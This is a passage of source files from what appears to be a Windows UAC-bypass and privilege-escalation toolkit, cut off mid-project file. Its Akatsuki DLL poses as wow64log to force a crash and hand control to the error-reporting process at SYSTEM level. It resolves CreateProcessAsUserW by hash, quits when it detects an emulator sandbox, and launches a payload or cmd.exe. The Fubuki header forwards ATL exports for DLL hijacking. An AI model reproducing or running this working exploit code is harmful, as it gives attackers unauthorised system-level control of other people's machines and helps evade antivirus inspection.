    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{f47eeec1-a71b-4ee9-b4eb-12077afe72ca}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strstri.c\">\n      <Filter>minirtl</Filter>\n    
</ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\windefend.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\util.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\shared.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\util.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\windefend.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\">\n      <Filter>Source Files</Filter>\n    </None>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"version.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Akatsuki/Akatsuki.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup />\n</Project>"
  },
  {
    "path": "Source/Akatsuki/dllmain.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016 - 2022\n*\n*  TITLE:       DLLMAIN.C\n*\n*  VERSION:     3.61\n*\n*  DATE:        22 Jun 2022\n*\n*  Proxy dll entry point, Akatsuki.\n*  Special dll for wow64 logger method.\n* \n*  WARNING: real wow64log must have native subsystem and only ntdll export.\n*  This one will force crash and propagate to WER process elevating to NTAuthority/System.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\shared.h\"\n#include \"shared\\libinc.h\"\n\n#define LoadedMsg      TEXT(\"Akatsuki lock and loaded\")\n\nHANDLE g_SyncMutant = NULL;\n\nUACME_PARAM_BLOCK g_SharedParams;\n\n\n/*\n* DummyFunc\n*\n* Purpose:\n*\n* Stub for fake exports.\n*\n*/\nVOID WINAPI DummyFunc(\n    VOID\n)\n{\n\n}\n\n/*\n* DbgDumpRuntimeInfo\n*\n* Purpose:\n*\n* Dump runtime info to the file, this routine is only for debug builds.\n*\n*/\nVOID DbgDumpRuntimeInfo()\n{\n    HANDLE hFile = INVALID_HANDLE_VALUE;\n    WCHAR szReportName[MAX_PATH * 2];\n    WCHAR sysdir[MAX_PATH + 1];\n\n    DWORD cch;\n    LPWSTR lpText = NULL;\n\n    DWORD bytesIO;\n    WCHAR ch;\n\n    cch = ucmExpandEnvironmentStrings(L\"%temp%\\\\\", sysdir, MAX_PATH);\n    if ((cch != 0) && (cch < MAX_PATH)) {\n        _strcpy(szReportName, sysdir);\n        _strcat(szReportName, TEXT(\"report_\"));\n        ultostr(GetCurrentProcessId(), _strend(szReportName));\n        _strcat(szReportName, TEXT(\".txt\"));\n\n        hFile = CreateFile(szReportName, GENERIC_ALL, 0, NULL, CREATE_ALWAYS, 0, NULL);\n        if (hFile != INVALID_HANDLE_VALUE) {\n\n        
    ch = (WCHAR)0xFEFF;\n            WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL);\n\n            lpText = ucmQueryRuntimeInfo(TRUE);\n            if (lpText) {\n                WriteFile(hFile, lpText, (DWORD)(_strlen(lpText) * sizeof(WCHAR)), &bytesIO, NULL);\n                ucmDestroyRuntimeInfo(lpText);\n            }\n            CloseHandle(hFile);\n        }\n    }\n}\n\n#define Hash_CreateProcessAsUserW 0xb75be93c\n\n/*\n* InitFunctionPtr\n*\n* Purpose:\n*\n* Retrieve required function ptr.\n*\n*/\nPVOID InitFunctionPtr(\n    VOID\n)\n{\n    UNICODE_STRING usKernel = RTL_CONSTANT_STRING(L\"kernel32.dll\");\n    UNICODE_STRING usAdvapi = RTL_CONSTANT_STRING(L\"advapi32.dll\");\n\n    NTSTATUS ntStatus;\n    PVOID ImageBase = NULL, dummy;\n\n    ntStatus = LdrLoadDll(NULL, NULL, &usKernel, &dummy);\n    if (NT_SUCCESS(ntStatus)) {\n\n        ntStatus = LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,\n            NULL, NULL, &usAdvapi, &ImageBase);\n\n        if (!NT_SUCCESS(ntStatus)) {\n            ntStatus = LdrLoadDll(NULL, NULL, &usAdvapi, &ImageBase);\n        }\n\n        if (NT_SUCCESS(ntStatus)) {\n            return ucmGetProcedureAddressByHash(ImageBase, Hash_CreateProcessAsUserW);\n        }\n    }\n\n    return NULL;\n}\n\n/*\n* DefaultPayload\n*\n* Purpose:\n*\n* Process parameter if it exists or start cmd.exe and exit immediately.\n*\n*/\nVOID DefaultPayload(\n    VOID\n)\n{\n    BOOL bSharedParamsReadOk;\n    UINT ExitCode = 0;\n    PWSTR lpParameter;\n    ULONG cbParameter;\n\n    BOOL bIsLocalSystem = FALSE;\n    ULONG SessionId;\n\n    PFNCREATEPROCESSASUSERW pCreateProcessAsUser;\n\n    if (!NT_SUCCESS(ucmCreateSyncMutant(&g_SyncMutant))) {\n        RtlExitUserProcess(STATUS_SUCCESS);\n        return;\n    }\n\n    //\n    // Read shared params block.\n    //\n    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n    if (bSharedParamsReadOk) 
{\n        lpParameter = g_SharedParams.szParameter;\n        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n        SessionId = g_SharedParams.SessionId;\n    }\n    else {\n        lpParameter = NULL;\n        cbParameter = 0UL;\n        SessionId = 0;\n    }\n\n    ucmIsLocalSystem(&bIsLocalSystem);\n\n    pCreateProcessAsUser = (PFNCREATEPROCESSASUSERW)InitFunctionPtr();\n\n    if (pCreateProcessAsUser) {\n\n        ExitCode = (ucmLaunchPayload2(\n            pCreateProcessAsUser,\n            bIsLocalSystem,\n            SessionId,\n            lpParameter,\n            cbParameter) != FALSE);\n\n    }\n    //\n    // Notify Akagi.\n    //\n    if (bSharedParamsReadOk) {\n        ucmSetCompletion(g_SharedParams.szSignalObject);\n    }\n\n    ucmSleep(5000);\n\n    NtClose(g_SyncMutant);\n\n    RtlExitUserProcess(ExitCode);\n}\n\n/*\n* DllMain\n*\n* Purpose:\n*\n* Proxy dll entry point.\n*\n*/\nBOOL WINAPI DllMain(\n    _In_ HINSTANCE hinstDLL,\n    _In_ DWORD fdwReason,\n    _In_ LPVOID lpvReserved\n)\n{\n    UNREFERENCED_PARAMETER(hinstDLL);\n    UNREFERENCED_PARAMETER(lpvReserved);\n\n    ucmDbgMsg(LoadedMsg);\n\n    if (wdIsEmulatorPresent() == STATUS_NEEDS_REMEDIATION)\n        RtlExitUserProcess('Foff');\n\n    if (fdwReason == DLL_PROCESS_ATTACH) {\n\n        LdrDisableThreadCalloutsForDll(hinstDLL);      \n        DefaultPayload();\n\n    }\n    return TRUE;\n}\n\n/*\n* EntryPointExeMode\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointExeMode(\n    VOID\n)\n{\n    BOOL IsDll = RtlImageNtHeader(GetModuleHandle(NULL))->FileHeader.Characteristics & IMAGE_FILE_DLL;\n    if (!IsDll) {\n        if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n            RtlExitUserProcess('foff');\n        }\n        DefaultPayload();\n    }\n}\n"
  },
  {
    "path": "Source/Akatsuki/export.def",
    "content": "EXPORTS\nWow64LogSystemService   = DummyFunc\nWow64LogInitialize      = DummyFunc\nWow64LogTerminate       = DummyFunc\nWow64LogMessageArgList  = EntryPointExeMode\n"
  },
  {
    "path": "Source/Akatsuki/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by version.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        101\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1001\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "Source/Fubuki/atldll.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2023\n*\n*  TITLE:       ATLDLL.H\n*\n*  VERSION:     3.64\n*\n*  DATE:        04 Feb 2023\n*\n*  ATL forwarded import.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#pragma comment(linker, \" /EXPORT:AtlAdvise=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAdvise,@10\")\n#pragma comment(linker, \" /EXPORT:AtlAxAttachControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxAttachControl,@41\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateControl,@39\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateControlEx=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateControlEx,@40\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateDialogA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateDialogA,@38\")\n#pragma comment(linker, \" /EXPORT:AtlAxCreateDialogW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxCreateDialogW,@37\")\n#pragma comment(linker, \" /EXPORT:AtlAxDialogBoxA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxDialogBoxA,@36\")\n#pragma comment(linker, \" /EXPORT:AtlAxDialogBoxW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxDialogBoxW,@35\")\n#pragma comment(linker, \" /EXPORT:AtlAxGetControl=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxGetControl,@47\")\n#pragma comment(linker, \" /EXPORT:AtlAxGetHost=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxGetHost,@48\")\n#pragma comment(linker, \" 
/EXPORT:AtlAxWinInit=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlAxWinInit,@42\")\n#pragma comment(linker, \" /EXPORT:AtlComPtrAssign=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlComPtrAssign,@30\")\n#pragma comment(linker, \" /EXPORT:AtlComQIPtrAssign=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlComQIPtrAssign,@31\")\n#pragma comment(linker, \" /EXPORT:AtlCreateTargetDC=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlCreateTargetDC,@26\")\n#pragma comment(linker, \" /EXPORT:AtlDevModeW2A=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlDevModeW2A,@29\")\n#pragma comment(linker, \" /EXPORT:AtlFreeMarshalStream=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlFreeMarshalStream,@12\")\n#pragma comment(linker, \" /EXPORT:AtlGetObjectSourceInterface=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlGetObjectSourceInterface,@54\")\n#pragma comment(linker, \" /EXPORT:AtlGetVersion=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlGetVersion,@34\")\n#pragma comment(linker, \" /EXPORT:AtlHiMetricToPixel=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlHiMetricToPixel,@27\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistPropertyBag_Load=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistPropertyBag_Load,@52\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistPropertyBag_Save=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistPropertyBag_Save,@53\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_GetSizeMax=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_GetSizeMax,@60\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_Load=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_Load,@50\")\n#pragma comment(linker, \" /EXPORT:AtlIPersistStreamInit_Save=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlIPersistStreamInit_Save,@51\")\n#pragma 
comment(linker, \" /EXPORT:AtlInternalQueryInterface=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlInternalQueryInterface,@32\")\n#pragma comment(linker, \" /EXPORT:AtlMarshalPtrInProc=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlMarshalPtrInProc,@13\")\n#pragma comment(linker, \" /EXPORT:AtlModuleAddCreateWndData=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleAddCreateWndData,@43\")\n#pragma comment(linker, \" /EXPORT:AtlModuleAddTermFunc=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleAddTermFunc,@58\")\n#pragma comment(linker, \" /EXPORT:AtlModuleExtractCreateWndData=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleExtractCreateWndData,@44\")\n#pragma comment(linker, \" /EXPORT:AtlModuleGetClassObject=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleGetClassObject,@15\")\n#pragma comment(linker, \" /EXPORT:AtlModuleInit=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleInit,@16\")\n#pragma comment(linker, \" /EXPORT:AtlModuleLoadTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleLoadTypeLib,@56\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterClassObjects=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterClassObjects,@17\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterServer=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterServer,@18\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterTypeLib,@19\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterWndClassInfoA=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterWndClassInfoA,@46\")\n#pragma comment(linker, \" /EXPORT:AtlModuleRegisterWndClassInfoW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRegisterWndClassInfoW,@45\")\n#pragma comment(linker, \" 
/EXPORT:AtlModuleRevokeClassObjects=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleRevokeClassObjects,@20\")\n#pragma comment(linker, \" /EXPORT:AtlModuleTerm=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleTerm,@21\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUnRegisterTypeLib=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnRegisterTypeLib,@55\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUnregisterServer=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnregisterServer,@22\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUnregisterServerEx=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnregisterServerEx,@57\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUpdateRegistryFromResourceD=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUpdateRegistryFromResourceD,@23\")\n#pragma comment(linker, \" /EXPORT:AtlPixelToHiMetric=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlPixelToHiMetric,@28\")\n#pragma comment(linker, \" /EXPORT:AtlRegisterClassCategoriesHelper=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlRegisterClassCategoriesHelper,@49\")\n#pragma comment(linker, \" /EXPORT:AtlSetErrorInfo=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlSetErrorInfo,@25\")\n#pragma comment(linker, \" /EXPORT:AtlSetErrorInfo2=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlSetErrorInfo2,@59\")\n#pragma comment(linker, \" /EXPORT:AtlUnadvise=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlUnadvise,@11\")\n#pragma comment(linker, \" /EXPORT:AtlUnmarshalPtr=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlUnmarshalPtr,@14\")\n#pragma comment(linker, \" /EXPORT:AtlWaitWithMessageLoop=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlWaitWithMessageLoop,@24\")\n"
  },
  {
    "path": "Source/Fubuki/dll.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|Win32\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|x64\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>dll</RootNamespace>\n    <ProjectName>Fubuki</ProjectName>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  
<Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  
<PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <GenerateManifest>false</GenerateManifest>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32</TargetName>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <GenerateManifest>true</GenerateManifest>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32</TargetName>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <GenerateManifest>true</GenerateManifest>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <TargetName>$(ProjectName)32</TargetName>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    
